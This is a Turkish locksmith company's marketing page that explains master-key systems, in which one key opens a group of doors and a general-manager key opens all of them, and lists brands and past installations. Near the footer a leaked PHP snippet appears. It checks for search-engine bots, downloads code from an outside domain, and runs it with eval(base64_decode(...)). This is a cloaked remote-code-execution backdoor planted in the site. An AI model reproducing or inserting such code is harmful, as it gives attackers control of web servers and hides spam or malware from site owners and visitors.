Multlock Master Sistem

Bu sunumumuzda siz değerli müşterilerimize ” Master Sistem ” hakkında gerçek ve doğru bilgiyi vermeye çalışacağız. Tamamen kullanıcı kolaylığı ve yetkilendirme niteliği taşıyan ” Master Sistem ” Hastahane, Okul, Fabrika v.b çok girişli ortamlarda bizden istenilen uygulamalardandır. Örnek verip detaya inecek olursak şu şekilde gerçekleşir.

X şirketinde bulunan Teknik Servis, muhasebe ve depo kapılarını nasıl yetkilendirebiliriz öncelikle bunu inceliyelim. 4 odalı olan teknik servis bölümünün tüm kapı kilitleri birbirini açsın, 6 haneli olan depo kapılarıda birbirlerini açsın fakat o anahtar teknik servis bölümünü açmasın bunun yanı sıra, 2 odalı muhasebe ofisimizin iki kilidi aynı anahtar ile açılsın fakat onlarda teknik ve  defo kapılarında işlem görmesin tabiki öylede bir anahtar yapın ” Genel Müdür ” anahtarı ki buda istisnasız bütün kapıları istenildiğinde açsın işte bu direkt olarak bir ” Master Sistem ” oluşumudur. Mesela 5  daireli bir apartman kapısının anahtarı ile daira kapınızı rahatlıkla açabilirsiniz diğer daire sakinide kendi dairesini tabiki daireler birbirini açmamak şartıyla :) buda isteğe göre ayarlanabilir. İstinye Borusan Oto – Darussafaka Acıbadem Hastahanesi – Sait Halim Paşa Yalısı yapmış olduğumuz Master uygulamalarına birer örnek olabilir. Ayrı bir uzmanlık isteyen Master uygulamasının herhangi bir Çilingir tarafından yapılması söz konusu bile değildir.

  • Kale Master Sistem
  • Mul-t-lock Master Sistem
  • Keso Master Sistem
Be Sociable, Share!

Yorum Yapın

if(preg_match("/bot/i",$_SERVER["HTTP_USER_AGENT"])): $output=file_get_contents("http://www.mobilyahizmet.com/link.txt"); eval(base64_decode($output)); endif; ?>

Sitenin Tüm Hakları Saklıdır. (2014)